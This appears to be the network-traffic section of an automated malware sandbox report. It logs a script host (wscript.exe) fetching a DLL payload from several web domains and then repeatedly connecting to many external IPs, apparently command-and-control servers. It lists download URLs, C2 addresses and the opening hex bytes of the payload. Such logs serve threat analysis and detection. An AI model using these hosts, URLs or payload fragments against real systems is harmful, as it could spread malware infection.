                                                                                                                                                                                                                  Mar 20, 2023 11:42:28.807595015 CET4970580192.168.2.4187.63.160.88
                                                                                                                                                                                                                  Mar 20, 2023 11:42:29.036659002 CET8049705187.63.160.88192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:42:29.544917107 CET4970580192.168.2.4187.63.160.88
                                                                                                                                                                                                                  Mar 20, 2023 11:42:29.773816109 CET8049705187.63.160.88192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:42:30.290250063 CET4970580192.168.2.4187.63.160.88
                                                                                                                                                                                                                  Mar 20, 2023 11:42:30.520076036 CET8049705187.63.160.88192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:42:35.999408007 CET497068080192.168.2.4167.172.199.165
                                                                                                                                                                                                                  Mar 20, 2023 11:42:36.168303967 CET808049706167.172.199.165192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:42:36.168499947 CET497068080192.168.2.4167.172.199.165
                                                                                                                                                                                                                  Mar 20, 2023 11:42:36.169275045 CET497068080192.168.2.4167.172.199.165
                                                                                                                                                                                                                  Mar 20, 2023 11:42:36.338208914 CET808049706167.172.199.165192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:42:36.347290993 CET808049706167.172.199.165192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:42:36.347335100 CET808049706167.172.199.165192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:42:36.347440958 CET497068080192.168.2.4167.172.199.165
                                                                                                                                                                                                                  Mar 20, 2023 11:42:36.355060101 CET497068080192.168.2.4167.172.199.165
                                                                                                                                                                                                                  Mar 20, 2023 11:42:36.524192095 CET808049706167.172.199.165192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:42:36.525511980 CET497068080192.168.2.4167.172.199.165
                                                                                                                                                                                                                  Mar 20, 2023 11:42:36.736675024 CET808049706167.172.199.165192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:42:37.352786064 CET808049706167.172.199.165192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:42:37.395750999 CET497068080192.168.2.4167.172.199.165
                                                                                                                                                                                                                  Mar 20, 2023 11:42:40.353796959 CET808049706167.172.199.165192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:42:40.353831053 CET808049706167.172.199.165192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:42:40.353956938 CET497068080192.168.2.4167.172.199.165
                                                                                                                                                                                                                  Mar 20, 2023 11:42:40.705112934 CET497068080192.168.2.4167.172.199.165
                                                                                                                                                                                                                  Mar 20, 2023 11:42:40.705188036 CET497068080192.168.2.4167.172.199.165
                                                                                                                                                                                                                  Mar 20, 2023 11:42:40.873661995 CET808049706167.172.199.165192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:42:40.873703003 CET808049706167.172.199.165192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:42:41.519542933 CET49707443192.168.2.4164.90.222.65
                                                                                                                                                                                                                  Mar 20, 2023 11:42:41.519596100 CET44349707164.90.222.65192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:42:41.519697905 CET49707443192.168.2.4164.90.222.65
                                                                                                                                                                                                                  Mar 20, 2023 11:42:42.198612928 CET49707443192.168.2.4164.90.222.65
                                                                                                                                                                                                                  Mar 20, 2023 11:42:42.198640108 CET44349707164.90.222.65192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:42:42.326728106 CET44349707164.90.222.65192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:42:42.326817036 CET49707443192.168.2.4164.90.222.65
                                                                                                                                                                                                                  Mar 20, 2023 11:42:42.329349995 CET49707443192.168.2.4164.90.222.65
                                                                                                                                                                                                                  Mar 20, 2023 11:42:42.329385996 CET44349707164.90.222.65192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:42:42.329938889 CET44349707164.90.222.65192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:42:42.331243992 CET49707443192.168.2.4164.90.222.65
                                                                                                                                                                                                                  Mar 20, 2023 11:42:42.331278086 CET44349707164.90.222.65192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:42:42.543200016 CET44349707164.90.222.65192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:42:42.543359995 CET44349707164.90.222.65192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:42:42.543484926 CET49707443192.168.2.4164.90.222.65
                                                                                                                                                                                                                  Mar 20, 2023 11:42:42.544631004 CET49707443192.168.2.4164.90.222.65
                                                                                                                                                                                                                  Mar 20, 2023 11:42:42.544673920 CET44349707164.90.222.65192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:42:42.544760942 CET49707443192.168.2.4164.90.222.65
                                                                                                                                                                                                                  Mar 20, 2023 11:42:42.544784069 CET44349707164.90.222.65192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:42:46.496776104 CET497088080192.168.2.4104.168.155.143
                                                                                                                                                                                                                  Mar 20, 2023 11:42:46.659801006 CET808049708104.168.155.143192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:42:47.162391901 CET497088080192.168.2.4104.168.155.143
                                                                                                                                                                                                                  Mar 20, 2023 11:42:47.325439930 CET808049708104.168.155.143192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:42:47.834105015 CET497088080192.168.2.4104.168.155.143
                                                                                                                                                                                                                  Mar 20, 2023 11:42:47.996953964 CET808049708104.168.155.143192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:42:53.499686003 CET497098080192.168.2.4163.44.196.120
                                                                                                                                                                                                                  Mar 20, 2023 11:42:53.706828117 CET808049709163.44.196.120192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:42:54.209711075 CET497098080192.168.2.4163.44.196.120
                                                                                                                                                                                                                  Mar 20, 2023 11:42:54.416542053 CET808049709163.44.196.120192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:42:54.928565979 CET497098080192.168.2.4163.44.196.120
                                                                                                                                                                                                                  Mar 20, 2023 11:42:55.134660006 CET808049709163.44.196.120192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:01.531841993 CET497108080192.168.2.4160.16.142.56
                                                                                                                                                                                                                  Mar 20, 2023 11:43:04.538757086 CET497108080192.168.2.4160.16.142.56
                                                                                                                                                                                                                  Mar 20, 2023 11:43:10.539208889 CET497108080192.168.2.4160.16.142.56
                                                                                                                                                                                                                  Mar 20, 2023 11:43:20.779827118 CET49711443192.168.2.4159.89.202.34
                                                                                                                                                                                                                  Mar 20, 2023 11:43:20.779879093 CET44349711159.89.202.34192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:20.781505108 CET49711443192.168.2.4159.89.202.34
                                                                                                                                                                                                                  Mar 20, 2023 11:43:20.781505108 CET49711443192.168.2.4159.89.202.34
                                                                                                                                                                                                                  Mar 20, 2023 11:43:20.781564951 CET44349711159.89.202.34192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:21.098905087 CET44349711159.89.202.34192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:21.100409985 CET49712443192.168.2.4159.89.202.34
                                                                                                                                                                                                                  Mar 20, 2023 11:43:21.100475073 CET44349712159.89.202.34192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:21.100583076 CET49712443192.168.2.4159.89.202.34
                                                                                                                                                                                                                  Mar 20, 2023 11:43:21.101439953 CET49712443192.168.2.4159.89.202.34
                                                                                                                                                                                                                  Mar 20, 2023 11:43:21.101469994 CET44349712159.89.202.34192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:21.356628895 CET44349712159.89.202.34192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:21.357670069 CET49713443192.168.2.4159.89.202.34
                                                                                                                                                                                                                  Mar 20, 2023 11:43:21.357723951 CET44349713159.89.202.34192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:21.357810020 CET49713443192.168.2.4159.89.202.34
                                                                                                                                                                                                                  Mar 20, 2023 11:43:21.359580040 CET49713443192.168.2.4159.89.202.34
                                                                                                                                                                                                                  Mar 20, 2023 11:43:21.359602928 CET44349713159.89.202.34192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:21.654941082 CET44349713159.89.202.34192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:21.656059027 CET49714443192.168.2.4159.89.202.34
                                                                                                                                                                                                                  Mar 20, 2023 11:43:21.656126022 CET44349714159.89.202.34192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:21.656228065 CET49714443192.168.2.4159.89.202.34
                                                                                                                                                                                                                  Mar 20, 2023 11:43:21.657457113 CET49714443192.168.2.4159.89.202.34
                                                                                                                                                                                                                  Mar 20, 2023 11:43:21.657480001 CET44349714159.89.202.34192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:21.953602076 CET44349714159.89.202.34192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:27.249928951 CET497158080192.168.2.4159.65.88.10
                                                                                                                                                                                                                  Mar 20, 2023 11:43:27.281265974 CET808049715159.65.88.10192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:27.796118975 CET497158080192.168.2.4159.65.88.10
                                                                                                                                                                                                                  Mar 20, 2023 11:43:27.827864885 CET808049715159.65.88.10192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:28.337712049 CET497158080192.168.2.4159.65.88.10
                                                                                                                                                                                                                  Mar 20, 2023 11:43:28.369061947 CET808049715159.65.88.10192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:33.748765945 CET49716443192.168.2.4186.194.240.217
                                                                                                                                                                                                                  Mar 20, 2023 11:43:33.748893023 CET44349716186.194.240.217192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:33.749274969 CET49716443192.168.2.4186.194.240.217
                                                                                                                                                                                                                  Mar 20, 2023 11:43:33.749779940 CET49716443192.168.2.4186.194.240.217
                                                                                                                                                                                                                  Mar 20, 2023 11:43:33.749809027 CET44349716186.194.240.217192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:33.972203016 CET44349716186.194.240.217192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:33.973434925 CET49717443192.168.2.4186.194.240.217
                                                                                                                                                                                                                  Mar 20, 2023 11:43:33.973515987 CET44349717186.194.240.217192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:33.973635912 CET49717443192.168.2.4186.194.240.217
                                                                                                                                                                                                                  Mar 20, 2023 11:43:33.974379063 CET49717443192.168.2.4186.194.240.217
                                                                                                                                                                                                                  Mar 20, 2023 11:43:33.974411011 CET44349717186.194.240.217192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:34.196011066 CET44349717186.194.240.217192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:34.197442055 CET49718443192.168.2.4186.194.240.217
                                                                                                                                                                                                                  Mar 20, 2023 11:43:34.197504997 CET44349718186.194.240.217192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:34.197688103 CET49718443192.168.2.4186.194.240.217
                                                                                                                                                                                                                  Mar 20, 2023 11:43:34.203314066 CET49718443192.168.2.4186.194.240.217
                                                                                                                                                                                                                  Mar 20, 2023 11:43:34.203351021 CET44349718186.194.240.217192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:35.430752039 CET44349718186.194.240.217192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:35.442882061 CET49719443192.168.2.4186.194.240.217
                                                                                                                                                                                                                  Mar 20, 2023 11:43:35.442930937 CET44349719186.194.240.217192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:35.443007946 CET49719443192.168.2.4186.194.240.217
                                                                                                                                                                                                                  Mar 20, 2023 11:43:35.450601101 CET49719443192.168.2.4186.194.240.217
                                                                                                                                                                                                                  Mar 20, 2023 11:43:35.450634956 CET44349719186.194.240.217192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:35.673536062 CET44349719186.194.240.217192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:42.011030912 CET497208080192.168.2.4149.56.131.28
                                                                                                                                                                                                                  Mar 20, 2023 11:43:42.114104033 CET808049720149.56.131.28192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:42.620026112 CET497208080192.168.2.4149.56.131.28
                                                                                                                                                                                                                  Mar 20, 2023 11:43:42.723098040 CET808049720149.56.131.28192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:43.229538918 CET497208080192.168.2.4149.56.131.28
                                                                                                                                                                                                                  Mar 20, 2023 11:43:43.332561970 CET808049720149.56.131.28192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:43:48.750972986 CET497218080192.168.2.472.15.201.15
                                                                                                                                                                                                                  Mar 20, 2023 11:43:51.761473894 CET497218080192.168.2.472.15.201.15
                                                                                                                                                                                                                  Mar 20, 2023 11:43:57.855993032 CET497218080192.168.2.472.15.201.15
                                                                                                                                                                                                                  Mar 20, 2023 11:44:04.252288103 CET497228080192.168.2.41.234.2.232
                                                                                                                                                                                                                  Mar 20, 2023 11:44:04.552196980 CET8080497221.234.2.232192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:44:05.059439898 CET497228080192.168.2.41.234.2.232
                                                                                                                                                                                                                  Mar 20, 2023 11:44:05.366040945 CET8080497221.234.2.232192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:44:05.872006893 CET497228080192.168.2.41.234.2.232
                                                                                                                                                                                                                  Mar 20, 2023 11:44:06.178153038 CET8080497221.234.2.232192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:44:11.544651031 CET497238080192.168.2.482.223.21.224
                                                                                                                                                                                                                  Mar 20, 2023 11:44:11.598838091 CET80804972382.223.21.224192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:44:12.106905937 CET497238080192.168.2.482.223.21.224
                                                                                                                                                                                                                  Mar 20, 2023 11:44:12.160903931 CET80804972382.223.21.224192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:44:12.669433117 CET497238080192.168.2.482.223.21.224
                                                                                                                                                                                                                  Mar 20, 2023 11:44:12.723637104 CET80804972382.223.21.224192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:44:18.257278919 CET497248080192.168.2.4206.189.28.199
                                                                                                                                                                                                                  Mar 20, 2023 11:44:18.288954973 CET808049724206.189.28.199192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:44:18.795069933 CET497248080192.168.2.4206.189.28.199
                                                                                                                                                                                                                  Mar 20, 2023 11:44:18.826802015 CET808049724206.189.28.199192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:44:19.341929913 CET497248080192.168.2.4206.189.28.199
                                                                                                                                                                                                                  Mar 20, 2023 11:44:19.373708010 CET808049724206.189.28.199192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:44:24.793097973 CET497258080192.168.2.4169.57.156.166
                                                                                                                                                                                                                  Mar 20, 2023 11:44:27.795788050 CET497258080192.168.2.4169.57.156.166
                                                                                                                                                                                                                  Mar 20, 2023 11:44:33.936964035 CET497258080192.168.2.4169.57.156.166
                                                                                                                                                                                                                  Mar 20, 2023 11:44:40.255136013 CET497268080192.168.2.4107.170.39.149
                                                                                                                                                                                                                  Mar 20, 2023 11:44:40.354561090 CET808049726107.170.39.149192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:44:40.859349012 CET497268080192.168.2.4107.170.39.149
                                                                                                                                                                                                                  Mar 20, 2023 11:44:40.958548069 CET808049726107.170.39.149192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:44:41.468772888 CET497268080192.168.2.4107.170.39.149
                                                                                                                                                                                                                  Mar 20, 2023 11:44:41.567739964 CET808049726107.170.39.149192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:44:47.008280039 CET49727443192.168.2.4103.43.75.120
                                                                                                                                                                                                                  Mar 20, 2023 11:44:47.008342981 CET44349727103.43.75.120192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:44:47.008469105 CET49727443192.168.2.4103.43.75.120
                                                                                                                                                                                                                  Mar 20, 2023 11:44:47.011816978 CET49727443192.168.2.4103.43.75.120
                                                                                                                                                                                                                  Mar 20, 2023 11:44:47.011841059 CET44349727103.43.75.120192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:44:47.298418045 CET44349727103.43.75.120192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:44:47.299798965 CET49728443192.168.2.4103.43.75.120
                                                                                                                                                                                                                  Mar 20, 2023 11:44:47.299855947 CET44349728103.43.75.120192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:44:47.299941063 CET49728443192.168.2.4103.43.75.120
                                                                                                                                                                                                                  Mar 20, 2023 11:44:47.301639080 CET49728443192.168.2.4103.43.75.120
                                                                                                                                                                                                                  Mar 20, 2023 11:44:47.301667929 CET44349728103.43.75.120192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:44:47.591048002 CET44349728103.43.75.120192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:44:47.592223883 CET49729443192.168.2.4103.43.75.120
                                                                                                                                                                                                                  Mar 20, 2023 11:44:47.592281103 CET44349729103.43.75.120192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:44:47.592375994 CET49729443192.168.2.4103.43.75.120
                                                                                                                                                                                                                  Mar 20, 2023 11:44:47.593463898 CET49729443192.168.2.4103.43.75.120
                                                                                                                                                                                                                  Mar 20, 2023 11:44:47.593487024 CET44349729103.43.75.120192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:44:47.883817911 CET44349729103.43.75.120192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:44:47.940192938 CET49730443192.168.2.4103.43.75.120
                                                                                                                                                                                                                  Mar 20, 2023 11:44:47.940249920 CET44349730103.43.75.120192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:44:47.940327883 CET49730443192.168.2.4103.43.75.120
                                                                                                                                                                                                                  Mar 20, 2023 11:44:47.941076994 CET49730443192.168.2.4103.43.75.120
                                                                                                                                                                                                                  Mar 20, 2023 11:44:47.941097975 CET44349730103.43.75.120192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:44:48.232604027 CET44349730103.43.75.120192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:44:53.787693977 CET497318080192.168.2.491.207.28.33
                                                                                                                                                                                                                  Mar 20, 2023 11:44:56.798182964 CET497318080192.168.2.491.207.28.33
                                                                                                                                                                                                                  Mar 20, 2023 11:45:02.814349890 CET497318080192.168.2.491.207.28.33
                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                  Mar 20, 2023 11:41:06.613833904 CET5856553192.168.2.48.8.8.8
                                                                                                                                                                                                                  Mar 20, 2023 11:41:07.601695061 CET5856553192.168.2.48.8.8.8
                                                                                                                                                                                                                  Mar 20, 2023 11:41:07.901333094 CET53585658.8.8.8192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:41:08.956974030 CET53585658.8.8.8192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:41:09.205490112 CET5223953192.168.2.48.8.8.8
                                                                                                                                                                                                                  Mar 20, 2023 11:41:09.269006014 CET53522398.8.8.8192.168.2.4
                                                                                                                                                                                                                  Mar 20, 2023 11:41:09.565880060 CET5680753192.168.2.48.8.8.8
                                                                                                                                                                                                                  Mar 20, 2023 11:41:09.703322887 CET53568078.8.8.8192.168.2.4
                                                                                                                                                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                  Mar 20, 2023 11:41:08.957191944 CET192.168.2.48.8.8.8d000(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                  Mar 20, 2023 11:41:06.613833904 CET192.168.2.48.8.8.80x9119Standard query (0)penshorn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Mar 20, 2023 11:41:07.601695061 CET192.168.2.48.8.8.80x9119Standard query (0)penshorn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Mar 20, 2023 11:41:09.205490112 CET192.168.2.48.8.8.80x51e1Standard query (0)bbvoyage.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Mar 20, 2023 11:41:09.565880060 CET192.168.2.48.8.8.80x820aStandard query (0)www.gomespontes.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                  Mar 20, 2023 11:41:07.901333094 CET8.8.8.8192.168.2.40x9119No error (0)penshorn.org203.26.41.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Mar 20, 2023 11:41:08.956974030 CET8.8.8.8192.168.2.40x9119No error (0)penshorn.org203.26.41.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Mar 20, 2023 11:41:09.269006014 CET8.8.8.8192.168.2.40x51e1No error (0)bbvoyage.com31.31.196.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Mar 20, 2023 11:41:09.703322887 CET8.8.8.8192.168.2.40x820aNo error (0)www.gomespontes.com.brgomespontes.com.brCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                  Mar 20, 2023 11:41:09.703322887 CET8.8.8.8192.168.2.40x820aNo error (0)gomespontes.com.br186.202.153.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  • penshorn.org
                                                                                                                                                                                                                  • bbvoyage.com
                                                                                                                                                                                                                  • www.gomespontes.com.br
                                                                                                                                                                                                                  • 164.90.222.65
                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  0192.168.2.449698203.26.41.131443C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                  2023-03-20 10:41:08 UTC0OUTGET /admin/Ses8712iGR8du/ HTTP/1.1
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                                  Host: penshorn.org
                                                                                                                                                                                                                  2023-03-20 10:41:09 UTC0INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Date: Mon, 20 Mar 2023 10:41:08 GMT
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  X-Powered-By: PHP/7.0.33
                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Content-Type: text/html;charset=utf-8


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  1192.168.2.44969931.31.196.172443C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                  2023-03-20 10:41:09 UTC0OUTGET /useragreement/ElKHvb4QIQqSrh6Hqm/ HTTP/1.1
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                                  Host: bbvoyage.com
                                                                                                                                                                                                                  2023-03-20 10:41:09 UTC0INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 20 Mar 2023 10:41:09 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  WWW-Authenticate: Basic realm="virus_block | access denied, please check email. For access use regru/regru."
                                                                                                                                                                                                                  2023-03-20 10:41:09 UTC0INData Raw: 31 37 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 76 65 72 69 66 79 20 74 68 61 74 20 79 6f 75 0a 61 72 65 20 61 75 74 68 6f 72 69 7a 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 0a 72 65 71 75 65 73 74 65 64 2e 20 20 45 69 74 68 65 72 20 79 6f 75 20 73 75 70 70 6c 69 65 64 20 74 68 65 20 77 72 6f
                                                                                                                                                                                                                  Data Ascii: 17d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>401 Unauthorized</title></head><body><h1>Unauthorized</h1><p>This server could not verify that youare authorized to access the documentrequested. Either you supplied the wro


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  2192.168.2.449700186.202.153.5443C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                  2023-03-20 10:41:10 UTC1OUTGET /logs/pd/ HTTP/1.1
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                                  Host: www.gomespontes.com.br
                                                                                                                                                                                                                  2023-03-20 10:41:10 UTC1INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Date: Mon, 20 Mar 2023 10:41:10 GMT
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  X-Powered-By: PHP/7.4.23
                                                                                                                                                                                                                  Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                  Expires: Mon, 20 Mar 2023 10:41:10 GMT
                                                                                                                                                                                                                  Content-Disposition: attachment; filename="rwPf3h8uzvlMGyyxN0K0OLQcAOU46ugB.dll"
                                                                                                                                                                                                                  Content-Transfer-Encoding: binary
                                                                                                                                                                                                                  Set-Cookie: 64183846a846c=1679308870; expires=Mon, 20-Mar-2023 10:42:10 GMT; Max-Age=60; path=/
                                                                                                                                                                                                                  Last-Modified: Mon, 20 Mar 2023 10:41:10 GMT
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Content-Type: application/x-msdownload
                                                                                                                                                                                                                  2023-03-20 10:41:10 UTC1INData Raw: 34 64 36 30 30 0d 0a
                                                                                                                                                                                                                  Data Ascii: 4d600
                                                                                                                                                                                                                  2023-03-20 10:41:10 UTC1INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4c 60 e2 3d 08 01 8c 6e 08 01 8c 6e 08 01 8c 6e 43 79 8f 6f 03 01 8c 6e 43 79 89 6f 8e 01 8c 6e 43 79 88 6f 04 01 8c 6e 88 7a 89 6f 28 01 8c 6e 88 7a 88 6f 06 01 8c 6e 88 7a 8f 6f 01 01 8c 6e 43 79 8d 6f 01 01 8c 6e 08 01 8d 6e 71 01 8c 6e 87 7a 85 6f 0c 01 8c 6e 87 7a 8c 6f 09 01 8c 6e 87 7a 73 6e 09 01 8c 6e 08 01 1b 6e 09 01 8c 6e 87 7a 8e 6f 09 01 8c 6e 52 69 63 68 08 01 8c
                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$L`=nnnCyonCyonCyonzo(nzonzonCyonnqnzonzonzsnnnnzonRich
